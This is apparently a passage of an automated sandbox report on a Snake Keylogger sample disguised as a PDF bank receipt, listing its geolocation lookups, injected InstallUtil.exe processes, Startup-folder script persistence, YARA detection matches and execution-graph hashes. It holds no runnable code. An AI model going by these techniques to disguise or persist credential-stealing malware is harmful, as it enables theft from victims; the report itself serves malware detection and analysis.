                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1318&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=700&delivery_rate=2195602&cwnd=249&unsent_bytes=0&cid=6ff130eb835ab461&ts=117&x=0"
                                                              2024-11-11 04:17:11 UTC | 363 | IN | Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              12 | 192.168.2.5 | 49734 | 188.114.96.3 | 443 | 1476 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-11 04:17:13 UTC | 86 | OUT | GET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:17:13 UTC | 842 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:13 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: MISS
                                                              Last-Modified: Mon, 11 Nov 2024 04:17:13 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rmQ7UntHmTuN6SalgP%2BSggqMrRnH79reOX9x%2Bm7uoUlcn2x9vFRS2%2BvhzNiS2QaT%2F%2FzXCfb2dbg8GoR1gpQqbcBNuJiQFq9R4QMBNNMDVCI5e143pz23orBeDzuoWEdI3WHQEBVn"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b78a91cd0a2f4-YUL
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=11648&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=700&delivery_rate=245382&cwnd=32&unsent_bytes=0&cid=135ae0614616149e&ts=425&x=0"
                                                              2024-11-11 04:17:13 UTC | 363 | IN | Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              13 | 192.168.2.5 | 49746 | 188.114.96.3 | 443 | 1476 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-11 04:17:14 UTC | 62 | OUT | GET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-11-11 04:17:14 UTC | 855 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:14 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 17
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vQc%2BIGxJpoQFS14jShoxrq5X%2FFtNAFRHQtPdNvIEyczpJLwsiaTfSUIAwXtc%2BtXPRH%2B2PuMZ4hYPVAB9SH7mYARqggCAK5Uef%2Fo9jkcX0i8%2F9nIWrTD1pBCeQO76mOPpX%2FuBMfjk"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b78b27a198ca8-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1280&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=700&delivery_rate=2303898&cwnd=244&unsent_bytes=0&cid=2edb24f00ba2fb91&ts=115&x=0"
                                                              2024-11-11 04:17:14 UTC | 363 | IN | Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              14 | 192.168.2.5 | 49758 | 188.114.96.3 | 443 | 1476 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-11 04:17:15 UTC | 62 | OUT | GET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-11-11 04:17:15 UTC | 843 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:15 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 18
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=goPv7p0fAuMrdMRK50qFX83AO931Pzn%2ByvgyaopWiHTT97b1Pb5ALhXGgrlb9ZwaxDFZQ3yO5JSnkuDiUs5JjovDpTdEQCPbUSrCMz6PTgn3xApM1TpbEcBaHU61mIQxYLRo8T9G"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b78ba1c640caa-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1169&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=700&delivery_rate=2462585&cwnd=233&unsent_bytes=0&cid=cc2bb256f4e014e6&ts=139&x=0"
                                                              2024-11-11 04:17:15 UTC | 363 | IN | Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              15 | 192.168.2.5 | 49770 | 188.114.96.3 | 443 | 1476 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-11 04:17:17 UTC | 86 | OUT | GET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:17:17 UTC | 849 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:17 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 20
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aGqpQFMiUhkHmuT7WMvnFsFJYypEBR%2FVet03ic9B03mMNVGcIi1FbEBonHvuQNhuRrQ6RSFC417kpD%2Fd5Mh0pkEGJjHu6HZ%2F%2FNb4qX0xBmadOfdukd82T1vL5JzhEn03QucZWcnW"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b78c1cbc41881-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1181&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=700&delivery_rate=2576512&cwnd=241&unsent_bytes=0&cid=2205a1b269aa3e65&ts=110&x=0"
                                                              2024-11-11 04:17:17 UTC | 363 | IN | Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              16 | 192.168.2.5 | 49782 | 188.114.96.3 | 443 | 1476 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-11 04:17:18 UTC | 86 | OUT | GET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:17:18 UTC | 847 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:18 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 21
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dzoSVb%2B7Vj3jIbEp5ZkZd0HECoiSXMz6edX%2FiC3XTh0j6tz8Hl0XkWM1JuoYF0CeIZFPFQgFetVez0eGEAY3bryuNH6ugLB%2Fk1KaBvLTLEHTxNzKUG7mxbFcLeEqgfjsIvF3aDbz"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b78c94fa2c358-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1131&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=700&delivery_rate=2540350&cwnd=250&unsent_bytes=0&cid=f7b2e116e6f8d09a&ts=109&x=0"
                                                              2024-11-11 04:17:18 UTC | 363 | IN | Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              17 | 192.168.2.5 | 49794 | 188.114.96.3 | 443 | 1476 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              2024-11-11 04:17:19 UTC | 86 | OUT | GET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:17:19 UTC | 847 | IN | HTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:19 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 22
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ROsmEE143iknoMbtBgvROy4maWYjpFkW0fzo4kV%2F6oFlMXzGysURWr%2BXVDKVilep5qtfxeuI2b8sGSB8ADuTAOpNMF8dIioNL9Fs7OxyVHxxVr%2FVwktc6qh4oYTUPucfikjs4n1G"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b78d0c935de92-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1260&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=700&delivery_rate=2339256&cwnd=245&unsent_bytes=0&cid=6f24d540883204db&ts=118&x=0"
                                                              2024-11-11 04:17:19 UTC | 363 | IN | Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Target ID: 0
                                                              Start time: 23:16:51
                                                              Start date: 10/11/2024
                                                              Path: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe
                                                              Wow64 process (32bit): true
                                                              Commandline: "C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe"
                                                              Imagebase: 0xab0000
                                                              File size: 1'250'816 bytes
                                                              MD5 hash: D99D18DBD5825F0FDDEF9063B0AFDF9C
                                                              Has elevated privileges: true
                                                              Has administrator privileges: true
                                                              Programmed in: C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2052275949.0000000006B60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2041673043.0000000002F8D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:23:16:54
                                                              Start date:10/11/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                              Imagebase:0x640000
                                                              File size:42'064 bytes
                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4478272423.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4478272423.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:moderate
                                                              Has exited:false

                                                              Target ID:3
                                                              Start time:23:17:04
                                                              Start date:10/11/2024
                                                              Path:C:\Windows\System32\wscript.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs"
                                                              Imagebase:0x7ff79f9e0000
                                                              File size:170'496 bytes
                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:4
                                                              Start time:23:17:05
                                                              Start date:10/11/2024
                                                              Path:C:\Users\user\AppData\Roaming\TypeName.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Roaming\TypeName.exe"
                                                              Imagebase:0xc50000
                                                              File size:1'250'816 bytes
                                                              MD5 hash:D99D18DBD5825F0FDDEF9063B0AFDF9C
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2181644021.000000000309C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 11%, ReversingLabs
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:6
                                                              Start time:23:17:08
                                                              Start date:10/11/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                              Imagebase:0xfb0000
                                                              File size:42'064 bytes
                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.4475386970.0000000000416000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4475386970.0000000000419000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000006.00000002.4475386970.0000000000419000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4477967897.00000000034DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.4477967897.0000000003321000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:moderate
                                                              Has exited:false


                                                                Execution Graph

                                                                Execution Coverage:9.4%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:3.7%
                                                                Total number of Nodes:243
                                                                Total number of Limit Nodes:8
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,nq$4$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                • API String ID: 0-162385967
                                                                • Opcode ID: dd12aeb14685549105014b1cb34f0687078aa24903db070d58573015c80c2571
                                                                • Instruction ID: bf32b1281abaadc61434faa33eab994c86b75808dbff2e06811af2e9f26e004c
                                                                • Opcode Fuzzy Hash: dd12aeb14685549105014b1cb34f0687078aa24903db070d58573015c80c2571
                                                                • Instruction Fuzzy Hash: 4FB21634A002289FDB54DFA9C994BADB7B6FF48700F1485A9E505AB3A5CB70ED81CF50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,nq$4$$jq$$jq$$jq$$jq
                                                                • API String ID: 0-3947795074
                                                                • Opcode ID: 3abad8d8f9d6ea220a880e067ef2a681806edf75746c2d0be923f9a0a8e1892a
                                                                • Instruction ID: adf056dd8b66c74bceaae58a7dcb6e8c97a69878a28b5bba1ae2880a2e4d3507
                                                                • Opcode Fuzzy Hash: 3abad8d8f9d6ea220a880e067ef2a681806edf75746c2d0be923f9a0a8e1892a
                                                                • Instruction Fuzzy Hash: C3220B34A00228DFDB64DFA5C994BADB7B2FF49304F1481A9E509AB3A5DB319D81CF50

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: TJoq$Tejq$Vv}$pnq$xbmq
                                                                • API String ID: 0-3803770593
                                                                • Opcode ID: 1519e90aa4f2a9b2c9642f714ced6bf865d0be24d7151c39d5d7885608189835
                                                                • Instruction ID: 9376d42c715eec7d5889332f1d352e7967704c83913dcf7110aff2e1e5de64d3
                                                                • Opcode Fuzzy Hash: 1519e90aa4f2a9b2c9642f714ced6bf865d0be24d7151c39d5d7885608189835
                                                                • Instruction Fuzzy Hash: BAA2C575A00628CFDB65CF69C984AD9BBB2FF89304F1481E9D509AB365DB319E81CF40

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2041545680.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e10000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: TJoq$Tejq$xbmq
                                                                • API String ID: 0-903294719
                                                                • Opcode ID: f513a5f416bcbfadb8cf0a90b065bec5cad0410792b579fb10ce69add58de14c
                                                                • Instruction ID: 561f1b2182c16b273298d7ad1c61564595c19276c6fc60f0b21aa4f4ae6a3c43
                                                                • Opcode Fuzzy Hash: f513a5f416bcbfadb8cf0a90b065bec5cad0410792b579fb10ce69add58de14c
                                                                • Instruction Fuzzy Hash: 4FC16675E016188FDB58DF6AD944ADDBBF2BF89300F14C0AAD809AB365DB305A81CF50

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052729526.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c80000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: foq$8
                                                                • API String ID: 0-1333828210
                                                                • Opcode ID: 77c7849bd6fda048657bc26b08e63840683a3d5c5a467d3598581db770969ae7
                                                                • Instruction ID: 908b15175b46b5a19b2cb79e45fe008054072d10ad140d8b70e1dd266bd75070
                                                                • Opcode Fuzzy Hash: 77c7849bd6fda048657bc26b08e63840683a3d5c5a467d3598581db770969ae7
                                                                • Instruction Fuzzy Hash: C462C775E006298FDB64DF69C854AD9B7B1FF9A300F1086EAD509A7354DB30AE81CF90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tejq
                                                                • API String ID: 0-2468842661
                                                                • Opcode ID: 9c4e88ff4442cc06be78388ad690c52c585f49f637dc2e2c76188fb21229e711
                                                                • Instruction ID: b99d293e0ab50e6e0e35ddf5b03c9e1185bb4a53585956bc4edae7fc2300d38d
                                                                • Opcode Fuzzy Hash: 9c4e88ff4442cc06be78388ad690c52c585f49f637dc2e2c76188fb21229e711
                                                                • Instruction Fuzzy Hash: 9E222F74A00228CFEB64DF69D854B9AB7F2FB8A300F1481AAC509E7754DB749E85CF50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tejq
                                                                • API String ID: 0-2468842661
                                                                • Opcode ID: 842f7f45bb30e0300e1d081bf3c3d09592950031d1507dd16759dbcc12b16ac8
                                                                • Instruction ID: 3922887e138475cf1d676f80f487bd30832275f67af1aa5420a13aaa52379670
                                                                • Opcode Fuzzy Hash: 842f7f45bb30e0300e1d081bf3c3d09592950031d1507dd16759dbcc12b16ac8
                                                                • Instruction Fuzzy Hash: 27121074A04228CFEBA4DF6AD854BA9B7F2FB4A300F1081AAD509E7754DB745E84CF50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2052649873.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6c30000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Tejq
                                                                • API String ID: 0-2468842661
                                                                • Opcode ID: 25821c0116b9fe3d891fb0e3a4b36a9cdc42e1dba5f0cb0377137b843368122e
                                                                • Instruction ID: ba30dc94aec9190c913818c6eeeab7d1a648fbefd44ce6b35b187c4335b9d1ee
                                                                • Opcode Fuzzy Hash: 25821c0116b9fe3d891fb0e3a4b36a9cdc42e1dba5f0cb0377137b843368122e
                                                                • Instruction Fuzzy Hash: 0212F178A00228CFEB64DF69D894B99B7F2FB5A300F1081AAD509E7754DB749E84CF50
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2050688982.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5990000_e-dekont (72).jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0&,
